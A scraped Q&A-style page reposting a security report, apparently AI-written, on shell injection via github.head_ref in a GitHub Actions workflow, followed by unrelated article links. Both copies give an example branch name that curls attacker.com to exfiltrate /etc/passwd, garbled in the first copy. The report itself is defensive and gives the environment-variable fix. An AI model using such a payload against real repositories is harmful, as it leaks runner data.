Security: Shell injection via github.head_ref in develop-merge-guard.yml

Question

Question

Grade: Education Subject: kent8192 reinhardt-web

Asked by: USER4458

72 Viewed 72 Answers

Answer (72)

USER1338

(1796)

Answer:

Security: Shell injection via github.head_ref in develop-merge-guard.yml

Summary: The develop-merge-guard.yml workflow directly interpolates github.head_ref (user-controlled PR branch name) into a run: step, enabling shell injection.

Affected File: .github/workflows/develop-merge-guard.yml:30-31

Description:

run: |
  BRANCH="${{ github.head_ref }}"
  if [[ "$BRANCH" == develop/* ]]; then

Since github.head_ref is the PR source branch name (controlled by the PR author), a maliciously crafted branch name like develop/(curl attacker.com/exfil?data=$(cat /etc/passwd)) would execute arbitrary shell commands on the runner.

Expected Behavior: User-controlled context variables should be passed via environment variables:

env:
  BRANCH: ${{ github.head_ref }}
run: |
  if [[ "$BRANCH" == develop/* ]]; then

Actual Behavior: github.head_ref is interpolated via ${{ }} expression directly in the run: step, allowing shell injection.

Mitigating Factors:

Workflow has contents: read and pull-requests: read permissions only (limited blast radius)
PR must target main branch

Recommendation: Update the workflow to pass github.head_ref as an environment variable and use it in the run: step instead of interpolating it directly.

Answered on 12 Maret 2026

USER7231 · Accepted Answer

Summary

The develop-merge-guard.yml workflow directly interpolates github.head_ref (user-controlled PR branch name) into a run: step, enabling shell injection.

Affected File

.github/workflows/develop-merge-guard.yml:30-31

Description

run: |
  BRANCH="${{ github.head_ref }}"
  if [[ "$BRANCH" == develop/* ]]; then

Since github.head_ref is the PR source branch name (controlled by the PR author), a maliciously crafted branch name like develop/$(curl attacker.com/exfil?data=$(cat /etc/passwd)) would execute arbitrary shell commands on the runner.

Expected Behavior

User-controlled context variables should be passed via environment variables:

env:
  BRANCH: ${{ github.head_ref }}
run: |
  if [[ "$BRANCH" == develop/* ]]; then

Actual Behavior

github.head_ref is interpolated via ${{ }} expression directly in the run: step, allowing shell injection.

Mitigating Factors

Workflow has contents: read and pull-requests: read permissions only (limited blast radius)
PR must target main branch

🤖 Generated with Claude Code

Answered on 12 Maret 2026

Security: Shell injection via github.head_ref in develop-merge-guard.yml

Question

Answer (72)

Summary

Affected File

Description

Expected Behavior

Actual Behavior

Mitigating Factors

Related Articles

Live Stream Monitoring and Dealer Visit (26-00000)

Crew Store

Mekanik Kendaraan Truk dan Alat Berat

[Bug]: Terraform bootstrap does not pass required variables to plan/apply

5. Длина одной стороны прямоугольника 4 см, дру- гой на 3 см меньше. Найди периметр этого - прямоугольника.

tuliskan sumber sumber informasi secara lisan

Events Call

body-parser-1.13.3.tgz: 5 vulnerabilities (highest severity is: 7.5) [main]

Recommended Articles

Lowongan Kerja Terbaru (Maret 2026)

Wahyu Widagdo Purnomo | AVP | Tech Builder | Corporate Athlete

Cheat Point Blank Pekalongan

5. Длина одной стороны прямоугольника 4 см, дру-
гой на 3 см
меньше. Найди периметр этого
-
прямоугольника.